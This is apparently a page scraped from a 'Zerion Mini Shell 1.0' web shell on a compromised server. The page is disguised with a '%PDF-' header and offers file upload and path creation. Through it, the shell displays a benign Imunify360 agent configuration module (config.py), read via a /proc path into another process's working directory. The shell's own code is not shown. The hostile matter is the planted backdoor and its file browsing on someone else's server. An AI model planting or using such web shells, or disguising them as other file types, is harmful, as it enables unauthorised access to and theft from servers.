%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/2/cwd/opt/imunify360/venv/lib64/python3.11/site-packages/defence360agent/utils/
Upload File :
Create Path :
Current File : //proc/2/cwd/opt/imunify360/venv/lib64/python3.11/site-packages/defence360agent/utils/config.py

import asyncio
import copy
import time
from logging import getLogger

from defence360agent.contracts import config, messages
from defence360agent.feature_management import checkers

CONFIG_UPDATE_TIMEOUT = config.SimpleRpc.CLIENT_TIMEOUT / 2

logger = getLogger(__name__)

OBSOLETE_SECTION = "KERNELCARE"
OBSOLETE_OPTION = "edf"


def warn_obsolete_option(data):
    if OBSOLETE_OPTION in data.get(OBSOLETE_SECTION, dict()):
        logger.warning(
            "Configuration update with an obsolete kernelcare option 'edf'."
            " This option has no effect."
        )


def enforce_waf_optin_policy(data):
    wordpress = data.get("WORDPRESS")
    if not isinstance(wordpress, dict):
        return
    if (
        config.caller_type.get() == config.UserType.NON_ROOT
        and wordpress.get("waf_enabled") is True
        and not config.Wordpress.WAF_DEFAULT
    ):
        wordpress.pop("waf_enabled", None)
        if not wordpress:
            data.pop("WORDPRESS", None)


async def update_config(sink, data, user=None):
    warn_obsolete_option(data)
    checkers.config_validation(data, user)
    enforce_waf_optin_policy(data)
    conf = config.ConfigFile(user)
    conf.dict_to_config(data, without_defaults=True)
    updated = asyncio.Event()
    await sink.process_message(
        messages.ConfigUpdate(
            conf=conf,
            timestamp=time.time(),
            event=updated,
            # Snapshot so a caller that reuses/mutates the delta after this
            # returns cannot alter what a handler reads as "submitted".
            submitted=copy.deepcopy(data),
        )
    )
    await asyncio.wait_for(updated.wait(), timeout=CONFIG_UPDATE_TIMEOUT)

Zerion Mini Shell 1.0